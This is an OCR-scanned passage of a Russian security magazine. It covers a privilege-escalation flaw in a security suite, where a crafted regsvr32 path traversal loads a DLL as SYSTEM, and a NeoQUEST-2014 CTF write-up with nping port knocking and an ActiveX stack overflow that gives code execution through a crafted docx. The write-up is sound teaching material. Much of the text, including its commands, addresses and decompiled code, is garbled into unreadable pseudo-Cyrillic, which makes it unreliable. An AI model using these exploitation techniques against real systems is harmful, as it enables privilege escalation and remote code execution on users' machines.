ашы.о-Ғр 

Јт1р5.о-Ғр (пот ыо гк п оы) 
соптеггс^о-Ғр Је_раг 
соттоп һапсИег 



6-ҒсЈ8е5с1се 48сеһесЈ7 ЗасЈ892а6 6с4о8-Ғе-Ғ 



1еагп_.п§_һапсЈ1ег 



7 8сЈасЈ52еЗ 4121-Ғ991 ссес4893 79сЈр5684 

8 с55 83Өе6 4С8-Ғ-Ғ-Ғ62 1 Ө9аЗӨ асЈ Һ592с8ес 

9 48Ө0С-Ғ0С 44Һ0С677 а72ӨЗӨ88 678есЈа1Ө 

10 21Ө538С1 4ЕА24453 С26Ө6Р82 51Ғ98Р54 



сопЈп§_һапсЈ1ег 
соп-сеггс^о-Ғр 
топ_.тог риегу 
рго"сест_:_рс_һапсЈ1ег 



Там их может бытв болвше. Так что еств простор дгт анализа и поиска у^звимостеи 
при обработке различных команд разными компонентами. 



ЗАГРУЖАЕМ ОЫ. 

Обработчик функ1дионала обидего назначени^ соттоп_һапсЈ1ег находитс^ в том же 
модуле асз.ехе по адресу 0Х004А8650. Әта функии^ исполвзует болвшои з\л/И:сһ сазе 
и выбирает соответствукзидее деиствие на основе команды. Вот список команд, ко- 
торые соттоп_һапс11ег обрабатывает. 



0 1 2 5 6 7 8 9 А В С 0 Ғ 10 11 12 13 14 15 16 17 1А 1В 1С 



Проанализировав некоторые из зтих команд, можно достичв интересного ме- 
ста — обработки команды Ғ1л1С_КЕС15ТЕК_01_1_ за номером 0x17. Передав әтот номер 
в соттоп_һапс11ег, мы вызовем проиддуру 5и_>_4ҒС4Е0. Она отвечает за регистраи,икз 
(наход^шеис^ в папке, куда установлен продукт) с помоидыо сервиса гедзп/32. 
ехе. Прои,едурка получает путв до асз.ехе путем вызова 5ио_4144С0. Затем к әтому 
пути добавл^етс^ им^ оиЈки. А потом функи,и^ исполвзует Сгеат_еРгосе55А( ) , чтобы 
зарегистрироватв 01.1. с помоидыо гедзуг32.ехе. Передаваема^ в Сгеат_еРгосе55А( ) 
командна^ строка будет иметв следукзидии вид: 

Ке§5Уг32.ехе /5 С:\Рго§гаш Ғ_.1е5\а§п_.1:ит\0и"_ро5"_ Бес игЈту БиЈте Рго\<-- 
5отепатеЈприт . сЈ11 

Ведзуг32.ехе может бытв исполвзован дгт регистраи,ии сот Сначала он подгру- 
жает библиотеку с помоидыо -.оасИЛогагу. Посколвку самозашита не позвол^ет нам 
ничего записатв в директорикз Адпј.ипл Ои.роз. Зесипту, то все выпгтдит достаточно 
безопасно. Но у^звимоств кроетс^ в том, что не филвтрукзтс^ спеисимволы, в част- 
ности обход директории. Таким образом, передав корректныи заголовок протокола 
и номер команды, возможно выполнитв следукзидии тркж: 

Ке§5Уг32.ехе /5 С: \Рго§гат Ғ_.1е5\а§п_.1:ит\0и"_ро5"_ 5есигЈту БиЈте Рго\ . . \ . . \ . . \<- 
ап§гу .сШ^ 



Так как Сгеат_еРгосе55А( ) выполн^етс^ с системными привилеги^ми, то гедзуг32.ехе 



оудет наследоватв зти привилегии и апдгу.аи загрузитси системои. 



ЗКСПЛУАТАЧИЛ 

Әксплуатаи,ик) даннои у^звимости также оставим за рамками статви. С кодом 
РоС әксплоита, которыи запускает команднукз оболочку с системными привилеп/т- 
ми, ты можешв ознакомитвс^ сам. Примечателвно, что әксплуатаии^ даннои у^зви- 
мости не требует какого-то спеииалвного метода, просто шлешв спеииалвно сфор- 
мированное сообидение (соблкзда^ правилвныи заголовок, флаги и прочее) на паип, 
проходишв проверку, достигаешв у^звимого места и загружаешв 01_1_. 

Архитектура АдпИит 0и1ро51 

КегпеМапс! Узег 1апс1 




ЗузЈепл изег Ыогпла! изег 

ВЫВОД 

Как видишһ, даже средства дгт обеспечени^ безопасности не могут бытв на 100% 
безопасны и могут бытв исполвзованы злоумышленником в своих коварных и,ел^х. 
Современные заидитные средства достаточно сложны, чтобы не содержатв в себе 
багов. 

Если поковыр^тв другие обработчики Јос1:1 и обработчики команд, то думакз, 
что вполне возможно наити еиде несколвко у^звимостеи. Ну а тебе совет на будуидее: 
прежде чем начинатв ковыр^тв конкретные веши, следует пон^тв архитектуру, тогда 
еств веро^тноств, что нужна^ мыслв придет сама :). _Н_ 



Взлом 

Загадки ЫеоСШЕЗТ 

РАЗБОР ЗАДАНИИ С ОНЛАИН-ТУРА ЫЕОО1ЈЕЗТ-2014 

Разбор задании хак-квестов — всегда возможностһ узнатв 
что-то новое и разобратвс^ в тех разделах ИБ, с которыми 
мало знаком. В прошедшем в коние феврал^ онлаин-туре 
ЫеоО1ЈЕЗТ-2014 было семв разноплановых задании, ав- 
торы которых сегоднл вместе стобои разберуттри из них: 
про анализ дампа 1ЈЗВ-трафика, рог1кпоскЈпд с Рас-Мап 
и самое сложное — с реверсингом плагина. 




п п о п 

^^^^ ^^^^ ^^^^ ^^^^ 

▼ ▼ ▼ ▼ 

Евгении Жуковскии Денис Селлнин Виктор Вагисаров Денис Скворчов, 

@хОг10к @\/11еееК старшии аналитик «НеоБИТ» 

5кУОг150У@пео-Ы1.т 

ЗАДАНИЕ 1. ОБНАРУЖЕНО НЕИЗВЕСТНОЕ ДЫМЛ1ДЕЕСЛ УСТРОИСТВО 

По легенде, участники подклкзчали неизвестное устроиство в металлическом корпусе 
к компыотеру, устроиство дымилосв, и «на руках» у них оставалс^ фаил, не имекзидии 
никакого расширени^, — с его помоидыо и нужно было каким-то образом получитв клкзч 
задани^. Логично, что фаил надо было открытв в текстовом или һех-редакторе и про- 
анализироватв. При беглом осмотре ввтсн^етс^, что в фаиле хран^тс^ имена лкздеи, 
телефонные номера и ЗМЗ-сообидени^, азначит, искомыи фаил не что иное, какдамп 
передачи данных между телефоном и ПК. 

Какие данные одни из самых спеи,ифичных дгт телефона? Правилвно, әсәмә- 
ски. В разделе, содержаидем ЗМЗ-сообидени^, замечаем подозрителвное сообиде- 
ние, описывакзидее паролв: «денв рождени^ моеи жены три раза». Отлично! Перва^ 
заи,епка. По номеру вычиогтем, какои именно абонент прислал зто сообидение. Им 
оказываетс^ некто Петр Вознесенскии. Примен^^ дедуки,икз Шерлока, понимаем, 
что жена его, веро^тно, имеет такукз же фамиликз. Иидем девушек с фамилиеи «Воз- 
несенска^»... Но еств загвоздка: таких абонентов несколвко и у каждого из них про- 
ставлена дата рождени^. 

Продолжим двигатвс^ далвше. Если еств паролв, значит, еств и то, что он открыва- 
ет. При далвнеишем анализе дампа обнаруживаетс^, что в нем содержатсл листинги 
директории телефона. В одном из подобныхлистингов присутствуетфаил с подозри- 
телвным именем 1оок_ат_1:гп5.72. Что ж, посмотрим на него: очевидно, что әто архив, 
упакованныи по алгоритму 7г. Өоод1е.сот лкзбезно подсказывает сигнатуру 7г-фаи- 
лов: «37 7А ВС АҒ 27 1 С». С помоидыо сигна- 
туры идентифи1дируем местонахождение 
про1десса передачи архива и, знал его дли- 
ну из листинга, выдел^ем фаил из дампа. 

В про1дессе разархивировани^ спраши- 
ваетс^ паролв, и тут вспоминаем про наи- 
денныедаты рождени^. Перебрав их(всего 
четыре), получаем, что архив открываетс^ 
припароле«091219900912199009121990» — 
три раза подр^д записанныи денв рожде- 
ни^ Евдокии Вознесенскои. 

Победа! Архив содержит в себе завет- 
ныи фаил \л/јп.тхт, в котором находитс^ клкзч 
задани^. 
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ЗАДАНИЕ 2. ИГРОДРОМ 

В легенде к заданикз был указан 1Р-а- 
дрес сервера (213.170.102.199) и сказа- 
но, что дгт св^зи с сервером управлени^ 
ракетои необходимо выигратв в Рас-Мап 
и что сервер ждет твоеи команды. 

Игровои сервер функи,ионировал под 
управлением разработаннои нами опера- 
|дионнои системы ҒеоОЗ и ожидал сете- 
вые пакеты с нужнои подстрокои на опре- 
деленныи порт, именно позтому простое 
сканирование Ыплар ничего интересного 
не давало — ни версии ОС, ни списка от- 
крытых портов. 

Догадавшисв, чтосерверждет команду 
с подстрокои "растап", участники скани- 
ровали иелевои сервер, ожида^ от него ответа. Например, исполызу^ утилиту прјпд, 
они могли послатв следукзидии запрос дл^ осуидествлени^ (ЈОР-сканировани^: 

прјп§ - -и сЈр -р 1-65535 -с 1 213. 170. 102.199 - - с1а1:а- 51:гЈпе "расшап" 

Дл^ мониторинга ответов от сервера можно было восполызоватыз^ \Л/Јгезһагк или 
1:срс1иплр. После отправки (ЈОР-пакета, содержаидего строку растап или Расплап, 
получаем следукзидии ответ от сервера с порта 1898: 




Рас-Мап 



<расшап> 

<еггог те55ә§е="Саг Г 1: рагзе ои-Ғ-Ғег. 1)5е 1:а§ <растап>" /> 
</растап> 



Определим далвнеишии протокол обидени^ с сервером, отправив тег <расплап/>: 

прјп§ - -и сЈр -р 1898 -с 1 213.170.102.199 - -с!а1:а-51:гЈпе "<расшап/>" 

Приходит ответ от сервера с сообидением об ошибке, из которого становитс^ пон^т- 
но, какои должен бытв формат команды дл^ старта новои игры: 

<растап> 

<еггог те55а§е = 'МЈ55Јп§ а1:1:гјри1:е "ас1:Јоп" Јп гоо1: пос!е! 115е "ас1:Јоп "=■«-■ 
"пеы§ате" -Ғог 5"ЕагЕ §ате ог "ас1:Јоп" = "пеы51:ер" -Ғог тоуе' /> 
</растап> 

Создадим игру командои 

прп.п§ --иф -р 1898 -с 1 213.170.102.199 - -с!а1:а-51:гјпе 'Чрастап ас1:Јоп=^ 
"пеы§ате"х/рас тап >" 



И ПППХ/ЧММ ПТВРТ ПТ ПРПВРПД П ППМВРТПТВРННЫМ пппбшрнмрм 1 



<расшап бате^^УеӨӨсЈбт^ЗсБтҸбӨВбеЗсхЗУ^ег^ВВБТ^ 

<Јп-Ғо те55а§е= ' Не11рЈ Мг. 51:гиуе. 1л1аЈ1:Јп§ -Ғог уои а1: "сһе пехт: соп§ге55. <-■ 

Үоиг шоуе. ЈЈ5е ас1:Јоп "пеы51:ер" апс! посЈе <сИгес1:Јоп> [11Рј РОШј 1.ЕҒТ ог <-■ 

К16НТ]</ с!Јгес1:Јоп>; -Ғог 5*:ер' /> 
</растап> 

Сделаем ход в игре: 

прп.п§ - -исЈ р -р 1898 -с 1 213.170.1 02.199 - -с1а1:а-51:г1П§ "<ра стап §атеЈс1=<-' 
"7еӨ9с16- Ғ13с5 -Ғс16Ө86е Зсс374е26һ8857" ас^Јоп="пеы5^ер"Х(ЈЈгес^:Јоп>К16НТ^ 
</с! Јгес1:Јоп></ растап >" 

Ответ от сервера: 

<растап> 

<ег гог те55а§е="1л!а Ј1:Јп§ -Ғог уои а1: 1:һе пехт: соп§ге55." /> 
</растап> 

Неудача, насждут на следукзидем конгрессе (что за конгресс?). На әтом шаге придет- 
с^ немного поразмыслитв и восполвзоватыз^ всезнакзидим Өоод1е.согл. 

Вспоминаем, что в предыдуидем ответе от сервера было: «Мг. 51тиуе. \Л/аШпд Тог 
уои а1: Ше пех1: сопдгезз». Соотносим вскз известнукз нам информаи,икз: Струве, упо- 
минание какого-то конгресса и номер порта — 1898. Св^зав вскз әту информаи,икз во- 
едино и восполвзовавшисв поисковыми системами, мы должны были приити к тому, 
что порт — зто год СБезда КПСС (или ранних ее форм), а «ждут нас» на 1903-м порту. 
Легко находитс^ список дат с^ездов КПСС — вот они, наши иелевые порты! 

Делаем ход уже на правилыныи порт: 

пр1п§ - - исЈр -р 19ӨЗ -с 1 213.170.1 02.199 - -с1а1:а-51:г1п§ "<расшап §ате1с1=<-' 
"7е09с16-Ғ13с5-Ғс16Ө86е Зсс374е2һһ8857" ас^Јоп="пеы5^ер"хс1Јгес^:Јоп>К16НТч-- 
</сЈЈгес1:Јопх/ра ст ап>" 

В ответе от сервера приходит пакет, по его содержимому можно догадатыз^, что дан- 
ные закодированы с помоидыо Вазе64, и раскодироватв их. 
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Раскодированные данные пакета 



По строке «%РЫӨ» в самом начале данных понимаем, что перед нами РЫӨ-кар- 
тинка. Открываем изображение и видим картинкус Рас-Мап. 

Теперв все становитс^ на свои места, и остаетс^ толвко проити игру. Далвнеишие 
ходы делаем последователвно на порты, соответствукзшие овездам КПСС. Дл^ того 
чтобы не повтор^тв все предыдушие шаги «вручнукз», можно автоматизироватв весв 
проиесс с помоидыо написани^ скрипта. 

В резулвтате после прохождени^ игры получаем ответотсервера, в котором и со- 
держитс^ клкзч: 

<расшап> 

^О-П-Ғо те55а§е= "Үои ЫЈп! Кеу Ј5 584ссӨ.с1-Ғ.44ас2 с1сӨӨесӨЗае6а5с1 937" /> 
</расшап> 

ЗАДАНИЕ 3. В ЧА1ДАХ К>ГА ЖИЛ БЫ ЧИТРУС? 

ДА, НО ФАЛВШИВЫИ ЗКЗЕМПЛЛР! 

Название зтого задани^ — из тои же серии, что и «СБешв еиде әтих м^гких франиуз- 
ских булок» — намекает на то, что оно будет как-то св^зано с текстом. И точно: участ- 
никам по легенде дан М5 \Л/огс! (ЫеоОиезЈОоситепЈ.сЈосх) со встроенным об^ектом 
АсЈК/еХ, содержаидимзашифрованноесвоиство, две □1_1_(аШ10.а , П и ЫеоОиезЈАс^уеХ. 
сЈИ) и 1Р-адрес (213.170.102.198). 



Клеч заданиз предстзвлен е ?том докүменгг\ еозданным прк помоши згбитно& өер<;ни 
прнлрженна Мкгскотт. Оттке ^Уогс! 2010. Исполизуиге АсЕЈуеХ к_млонент г ҝотормИ полүчен Баин 
вместе с докүментом н ресурс нз котором он үстдновлен дпл прокоЈиденни 

данногс- заданнл. 

АИ. 11.00 ј 

■ 

■ . 
*. П ..Ј* 



Содержимое документа 

РАЗВЕДКА БОЕМ 

Скажем сразу: библиотека аШ10.сШ нужна толвко тем, у кого не установлена \/Јзиа1 
ЗЈисПо 11 или ВесПзЈпоиЈаЫе-пакет. Ее необходимоств обусловлена тем, что АсИуеХ 
написан и скомпилирован так, что д/т его работы необходима установленна^ или 
просто лежаша^ в тои же папке библиотека АП_ версии 110. В осталвном она не пред- 
ставл^ет интереса дгт участников. 

Первым очевидным шагом будет открытие документа ЫеоОиезЈОоситеп^.сЈосх. 

В документе еств АсИуеХ, реализованныи с помоидыо АТ1_ 11 .00. Дл^ его исполне- 
ни^ он должен бытв зарегистрирован в системе. С правами администратора испол- 
н^ем в команднои строке следукзидукз команду: 

ге§5У г32.ехе № о0.ие51:Ас1:-УеХ . сЈ 11 

После удачнои установки АсИуеХ-компонента открываем документ в 32-битнои вер- 
сии МЈсгозоТСО^ЈсеМогс! 2010. какүказано в подсказке кзаданикз. Содеожимое изме- 



нилосһ: к нему добавиласв надписв «ШОесгурИоп Еггог!!!». Изменени^ еств, но клкзч 
все также не получен. Самое врем^ посетитв ресурс, которыи находитс^ по адресу 
213.170.102.198. Там обнаруживаем веб-форму, позвол^кзидукз загружатв на сервер 
толвко фаилы формата с!осх. Пробуем загрузитв наш фаил — ничего не происходит. 
Напрашиваетс^ мыслв о том, что загружатв надо какои-то спеи,иалвно сформиро- 
ванныи документ. 

Дл^ вы^снени^ рассмотрим внимателвнее документ ЫеоОиезШоситепЈ.сЈосх. 
В нем загружаетс^ АсИуеХ, и резулвтатом запуска ^вл^етс^ ОесгурИоп Еггог. Исследу- 
ем АТ1_ соп1то1, дл^ зтого вклкзчаем в\Л/огс! вкладку разработчика, переходим на нее, 
нажимаем кнопку ОезЈдпМосЈе и смотрим своиства обвекта. 

Логично предположитв, что ошибка ОесгурИоп Еггог по^вл^етс^ в резулвтате по- 
пытки расшифровки своиства Епсгур1:ес1Тех1:В1оһ (говор^идее название!). Значение 
своиства, как сразу видно, закодировано в Вазе64. Пробуем помен^тв его, но тут 
\Л/огс! вдруг падает. 













■ 


__ 


■ 

к: 






1 0_п)_) 














!__?_ 






305,25 




I 



Своиства об^екта 



ПОИСК УЛЗВИМОСТИ 

Открываем в отладчике и сразу же смотрим Са11 51:аск. 

Сразу видно, что что-то здесв не так. Адреса возврата как будто переписаны (по- 
хоже на переполнение стекового буфера), но важныи момент, которыи можно отскз- 
да достатв: *исклк_чителвна^ ситуаии^ возникла не в модуле непосредственно\Л/огс!, 
а в установленном нами активном компоненте*. 



СаИ 55лск 



М-агпе 



СаП 5*аск 



п 



|Ғј_гл-__- ^о-а- тау һе 1П£опгес_ ап^/ог лнкјпд, по _ут_>о!_ 1о__1ес_ гог Ые 
1Ч»Оие^с1№^с111!2000£4ссО ИИНМНННННМШИНН 
и_егЗ_!. сЈ1 1!_,и_егС_1Г№лРгос С һес Шпп ^360 * &м)к оу1« 

|Гг_гг___!__1 11*_1гг1т|о<кС11епИтс@40 * СҺ_ј ^у|#£ 
игегЗг.сЈШЈпТегпл^СлГ^тРгос^^СО * 0x23 һу.е_ 
и_егЗг.Ј11!_и1егСл11№пРгосСһеск№_«-ф360 + Охһс! 

игегзг. _!«!_с мт^^г^мт^ш * о^ы _**« 

и»гЗ?.^11!_С>1№.п4ом1|РгосАег00 - ОхЧһуХм 



= 





и5ег32.(Ј11!ЈпгсгплЈСаҒ^7|лРгосф200 +■ &с23 һу(« 




1ЈЕСг32.1М! 




у«г32.<111! 





Здесв можно ради лкзбопытства открытв 10А и в неи пробежатыз^ по адресам Са11 
5Таск'а, которые кажутс^ более-менее вмен^емыми. По идее, нам нужно было бы вы- 
числитв ВУАаварииного завершени^ (адрес, которыи мы нашли в стеке вызовов, ми- 
нус адрес базы загрузки модул^) и далвше исполвзоватв его в 10А, но данныи АсТмеХ 
собран без А51_В (увидетв әто можно в ВЈпЗсоре, 10А, ТоТа1стс! или реехр!огег), так 
что наиденныи адрес равен адресу ВУА. 

Адрес 0х2000ос!Те принадлежит функи,ии теттоуе(), котора^ статически прилин- 
кована к ЫеоОиезТАсТЈуеХ.сШ. В 10А видно, что зтот адрес принадлежит промежут- 
ку адресов, которые занимает код функи,ии теттоуе(). Адрес 0х200024сс ^вл^етс^ 
адресом возврата после вызова функи,ии теттоуе(). И әтот код уже написан разра- 
ботчиками модул^. 

Пробуем подн^твс^ выше по СаИ 5Таск'у и понимаем, что осталвные адреса 
«согшрТес!». Ну не вызывакггс^ так методы СОМ-обБектов. Пробуем «поигратв»: вво- 
дим в своиство сопТгоГа оченв длиннукз строку типа «АААА...». Но, как ни странно, ни- 
чего не происходит. Добавим еиде символ, два, три, п^тв — никаких ошибок не про- 
исходит, \Л/огс! не падает. При открытии документа значение своиства ^вно было 
закодировано в Вазе64, попробуем по аналогии закодироватв в неи строку «АААА...». 
Получаем строку вида «011ҒВ011ҒВ...». При установке своиства в полученное значе- 
ние МјсгозоТТ ОТТЈсе \Л/огс! вновв падает. После того как мы податтачимс^ отладчиком 
к интересукзшему прои,ессу, видим следукзшук) картину: 

1 . Текуидии указателв на вершину стека указывает на ^вно переписанные нами дан- 
ные (да, әто деиствителвно ВоҒ јп Тһе зТаск). 

2. Адрес возврата переписан на значение 0x41414141 . И оп^тв же сделано әто нами, 
пока что без злого умысла. 

Таким образом, в модуле АсТмеХ, реализованном в бинарном фаиле ЫеоОиезТАсТЈуеХ. 
сШ, наидена у^звимоств, которукз с уверенностыо можно назватв әксплуатируемои 
(отсутствукзт даже зесипТусоокЈез) и котора^ даст возможноств выполнитв произ- 
волвныи код на машине полвзовател^. Ограничением будет то, что әтот АсТмеХ-ком- 
понент должен бытв установлен в системе полвзовател^. Примерныи си,енарии ата- 
ки следукзидии: 

1. Мы отправл^ем спеи,иалвно сформированныи документ формата с!осх полызо- 
вателкз, на машине которого установлен у^звимыи АсТмеХ. 

2. Полвзователв открывает әтот документ в МјсгозоТТ ОТТЈсе \Л/огс!, и на его машине 
выполн^етс^ наш код. После әтого \Л/огс! может авариино завершитыз^ или же 
продолжитв свокз работу в обычном режиме. Әто зависит от того, как мы напи- 
шем код (а әто, в свокз очередв, уже от того, боимс^ ли мы вызыватв какие-то 
подозрени^ у полвзовател^). 

Теперв при должном старании мы можем сформироватв документ, которыи позво- 
лит при его открытии исполнитв произволвныи код. И пр^мо хочетс^ загрузитв та- 



кои документ на ранее упом^нутыи в задании ресурс 213.170.102.198. Но какои код 
нам имплементироватв в документ? И что в случае удачнои атаки мы будем искатв 
на сервере? 

НЕУЕНЗЕ 

Ответы на все зти вопросы дает геуегзе епдјпееппд. Очевидно желание посмотретв, 
что все-таки произошло, из-за чего приложение авариино завершилосв и что в кон- 
|де кон1дов АсИуеХ реализует. 

В первом приближении 

Дл^ начала рассмотрим ЫеоОиез1:Ас1:ЈуеХ.с111 в о1еуЈе\л/.ехе. Әто даст нам информа- 
|дикз о классах, их своиствах и методах, реализованных в АсИуеХ. Нас интересует 
класс с (Ј1Ш'ом 57С18СС0-АО0Ғ-453В-АО80-ҒЗҒ7Ғ2ҒО4СЕ8. Узнатв 1)1110 класса, 
встроенного в документ АсИуеХ-об^екта, проше всего, изменив расширение с!осх 
на гјр, открыв фаил как архив. Там будет фаил типа \\л/огс!\ас1:ЈуеХ\ас1:ЈуеХ1 .хт1, в со- 
держании которого будет искомыи \Ј\Ј\0. 

<ах:осх ах: с!а55Јс!="{57С18ССӨ-АРӨҒ-453В-АР8Ө-ҒЗҒ7Ғ2ҒР4СЕ8}" <- 
ах: рег5Ј5тепсе= "рег5Ј51:51:ога§е" г : Јс1="г1с11" .. ./> 

Искомыи класс имеет название Епсгур1:ес1 Техт, наследуетс^ от двух интерфеисов 
1Епсгур1:ес1Тех1: и ЈЕпсгурЈесТехЈЕуепЈз и, по сути, реализует одно своиство с гетте- 
ром и сеттером и один метод. Описание класса Епсгур1:ес1 Тех1: в о!еуЈе\л/.ехе выггтдит 
следукзшим образом: 

I 

ииЈс1(57С18ССӨ-АРӨҒ-453В-АР8Ө-ҒЗҒ7Ғ2ҒР4СЕ8 ) , 
С01ТСГ01 

Ј 

сос!а 55 Епсг уртесЈТе хЈ: { 

[с!е-Ғаи11: ] 1ггсег-Ғасе ^Епсгур^сесЈТехт; 

[сЈе-Ға иИ:, 5оиг се] сЈЈ5рЈггсег-Ғасе _1Епс гур1:ес1Тех1:Еуеггс5; 

}; 
I 

осИ, 

ииЈс!(54СВ1752-7Р11-42Ө5-993Е-ЕЗЗВ5Ө917Ө7Р )Ј 
с1иа1Ј 

попех-сеп51ЫеЈ 
о1еаи"сота"С1оп 

Ј 

Јггсег-Ғас е 1Епсг уртес1Тех1: : 1Р Ј5ратсһ { 
[јсј( ӨхӨӨӨӨӨ ӨӨ!), ргор§етЈ^ 

НКЕ5Ш.Т Епс гуртес1Тех1:В1ор (оитЈ гетуа! ( В5ТК* рУа1); 

[ЈсЈ(ӨхӨӨӨӨӨ ӨӨ1) , ргорритЈ^ 

НКЕ5Ш.Т Епсгурте с1Тех1:В1ор( Јп ( В5ТК р Уа1); 

[ј(Ј( 0x0 0000002 )] 



нкеыл.! ыпсгург I ехти, 

[јп] В5ТК ЫеагТехт^ 
[ј п] В5ТК сеП^е^а!, 
ои*Ј_ге.*уа1 ( В5ТК* епсгур-сесШоо) ; 

Һ 

Из описани^ класса становитс^ пон^тно, что ошибка находитс^ где-то в сеттере свои- 
ства Епсгур1:ес1Тех1:В1оо, ведв приложение вылетает с ошибкои, когда мы его устанав- 
ливаем в новое значение. Соответственно, сеттер зтого своиства и будет тем участ- 
ком кода, с которого лучше начатв геуегзе. 

Клиент на си 

АсИуеХ достаточно непросто реверситв. Например, упом^нутыи сеттер не зкспорти- 
руетс^, зкспортирукзтс^ лишв функи,ии типа 011ке§15т_ег5егуег, 011Сет_С1а550ојес1: 
и другие. Всего их там штук шеств. Адрес сеттера будет в таблии,е виртуалвных функ- 
|дии. Позтому предпагаетс^ написатв простенвкии клиент, вызывакзидии интересукзидук) 
функ1дик) и передакзидии в нее параметры, азатем в дебаггере наити адрес, на которыи 
передаетс^ управление. Потом в 10А переити на зтот адрес и реверситв. 

Мы написали клиент на С. Интересукзидии класс реализует интерфеис 1015рат_сһ, 
позтому создаем зкземпл^р СОМ-обвекта, получаем указателв на реализованныи им 
интерфеис Шпкпомп, вызываем метод әтого интерфеиса С_иегу1пт_ег-Ғасе с параме- 
тром ИОЈОЈзра.сһ, получаем указателв на Озра.сһ и вызываем метод 1пуоке сеттера 
своиства Епсгур.ес1Тех1:В1оо. В резулвтате управление передаетс^ на кодсеттера. 

В СаИ 31:аск вызов сеттера выггтдит так: 

СҺЈ1с1ЕВР Ке-сАсЈсЈг 

1л1Ак1\11МС: 5таск ипы1пс1 11тҒогта"С10п пот ауаПаЫ е. Ғ о11оыјп§ -Ғгатез тау ое ыгоп§. 

Ө0С2-Ғ854 751е4-Ғе9 МеоО_ие51:Ас1:1ҮеХ+0ха690 

Ө0С2-Ғ870 751ео5"Ғс 01_ЕАиТ32 ! РЈ5рС а11Ғипс+ Өх165 

00С2-ҒЫ8 20008379 01_ЕАиТ32 ! С Туре1гтҒ о2 : : 1пу оке+0х2с1р 

00С2-ҒҺ40 008а156сЈҸеоС_ие51:Ас1:1үеХ+0х8379^ 

00с2-Ғсо4 008а1с39 Те5т_С0М0һјес1: !ыта1п+0х19с 

00с2-Ғс104 008а1е2с1 Те51:СОМОҺјес±1_ста1пСкТ51:аг1:ир+0х199 

00с2-Ғс10с 74ое850с1 Те51:С0М0һјест !мта1пСкТ5тагтир+0хс1^ 

00с2-Ғс118 7733Ы=39 КЕКЫЕ1.32 ! Ва 5еТһ геас11 пЈ1:Тһипк+ 0хе 

00с2-Ғс15с 773 3Һ-Ғ0С птс1 11_77 2еӨӨӨӨ ! _кт11Ј5егТһг еас151:аг1:+Өх72 

00с2-Ғс!74 00000000 птс Ш 77 2еӨ00Ө! кт11Ј5егТһгеас151:аг1:+0х1о 



Мы получили адрес начала кода сеттера — 0х2000а690 (база ЫеоОиез.Ас.ЈуеХ.сШ — 
0x20000000). 

Пеуегзе епдјпеегјпд 

Обратныи инжиниринг в болвшои мере прои,есс творческии. Врем^, затраченное 
на данныи әтап, может силвно разнитвс^ в зависимости от квалификаи,ии, опыта, ин- 
туии,ии, а зачастукз и просто удачи или наити^. Мы не будем описыватв данныи әтап, 
скажем лишв, что исходные данные таковы: точка начала функи,ии, дизассемблер 
10А, возможно, декомпил^тор от Нех-Вауз. Автоматизироватв әтот прои,есс пред- 



ставл^етс^ маловеро^тным. Ну а мы сразу переидем к итогам. 
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1п1 с<1ес1 ми1тҒипс( ВУТЕ **а1) 

< 

1п1 у1 ; // есхШ 
1п_: »2; // еахИЗ 
1п_: мЗ; // езКЗД 
51дг>е<1 1п1: и4; // есЈШб 
_ВҮТЕ ***у5; // есх@7 
сһаг мб; // аШВ 
5_.__ғ__: у7; // еах@12 
_В¥Т_ ***уа; // еахепз 
сһаг м9; // с1Ө14 

сһаг м11[16]; // [5р+№Ј [_ф-2ӨҺ]__2 
_.!.■_ У12; // [&р+1ӨҺ] [Һр-10Һ]ВЗ 
ап* у13; // [5р+1Сһ] [Һр-Ј|һ]вз 



«1 - (Ф1)(1]; 
1Ғ ( (м1 | (**а1 « 8)) > 
пешноме 0(и11 т *а1 + 2 Р 



8 ) 

И | (*»а1 « 8»); 



Псевдокод 
улзвимои 
функи,ии, по- 
лученныи из 
Нех-Рауз 



В резулвтате реверс-инжиниринга ЫеоСшез.Ас.ЈуеХ.сШ получаетс^ следукзидии ал- 
горитм работы (см. рис. 8). При выставлении своиства Епсгур_ес!Тех1:В1оо вызываетс^ 
сеттер. В него передаетс^ строка, котора^, в свок, очередв, декодируетс^ из Вазе64. 
Далее полученныи массив баит делитс^ на отрезки. Берутс^ первые два баита, кото- 
рые содержат в себе длину второго отрезка. Затем в стековыи 16-баитныи буфер ко- 
пируетс^ второи отрезок. Здесв-то и происходит ошибка и падение в случае, если 
длина указана более 16. С помоидвкз функи,ии тетшоуе пам^тв копируетс^ без провер- 
ки количества копируемых баит. 
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Са11 5*аск и содержимое стека в момент падени^ программы 



Затем, в случае нормалвногохода программы, беретс^ второи отрезок баит и пар- 
ситс^, как серииныи номер сертификата. В хранилииде сертификатов ишетс^ серти- 
фикат с указанным серииным номером. И если сертификат наиден, на нем при помо- 
ши функи,ии Сгур1:0есгур-1:Ме55а§е расшифровываетс^ третии отрезок. В резулвтате 
әтого мы должны получитв клкзч дл^ прохождени^ задани^. 

Зна^ формат передаваемых данных, можем получитв серииныи номер необхо- 
димого сертификата и изучитв третии отрезок. Декодируем строку своиства об^екта 
и вытаскиваем с третвего по восемнадиатыи баит (первые два баита имекзт значение 
0x10) — получаем серииныи номер сертификата. 

Третии отрезок передаетс^ в Сгур1:0есгур-1:Ме55а§е, а следователвно, закоди- 
рован в А5Ы.1. Открываем зти данные в лкзбом приложении дгт просмотра А5Ы.1 



и видим, ч I »ј I I у\у\ и I рео^лч ^с1шифривс1м нс* оер I ификсд I е, оериимыи гиЈмер 1ч»ј I <ј|Ј1н \ј 

указан во втором отрезке. 



Стратегил прохожденил заданил 

Итак, из всего сказанного делаем вывод, что нам в систему нужно установитв сер- 
тификат, на котором был зашифрован клкзч. После зтого при открытии документа 
МеоОие5Шосиплепт..с1осх мы увидим не «!!!ОесгуртЈоп Еггог!!!», а искомыи клкзч. 

Откуда вз^тв сертификат? В задании дан некии сервер, которыи мы ранее посе- 
идали. Кроме как оттуда, болыле вз^тв неоткуда. На әтом шаге уже можно полностыо 
пон^тв стратегикз прохождени^ задани^: 

1 . Создатв документ, әксплуатирукзшии у^звимоств в ЫеоОие51:АстЈуеХ.с111 и выпол- 
н^кзшии полезнук) нагрузку в виде скачивани^ нужного сертификата. 

2. Загрузитв его на сервер указанныи в задании (в задании сказано: «ресурс 
213.170.102.198, на котором он установлен», азначит, әксплоит должен там отра- 
ботатв). 

3. Скачатв сертификат. 

4. Установитв его на свокз машину. 

5. Открытв документ ЫеоОиезШосиплепЈ.сЈосх и получитв расшифрованныи клкзч 
прохождени^ задани^. 



(0,1210) 5Е£ТЈЕЫСЕ 

| Ө (4,9) ОБЈЕСТ 11ЈЕЫТ1Ғ1ЕЕ : еггге1ореШ)а1;а : '1.2.840.113549.1.7.3 

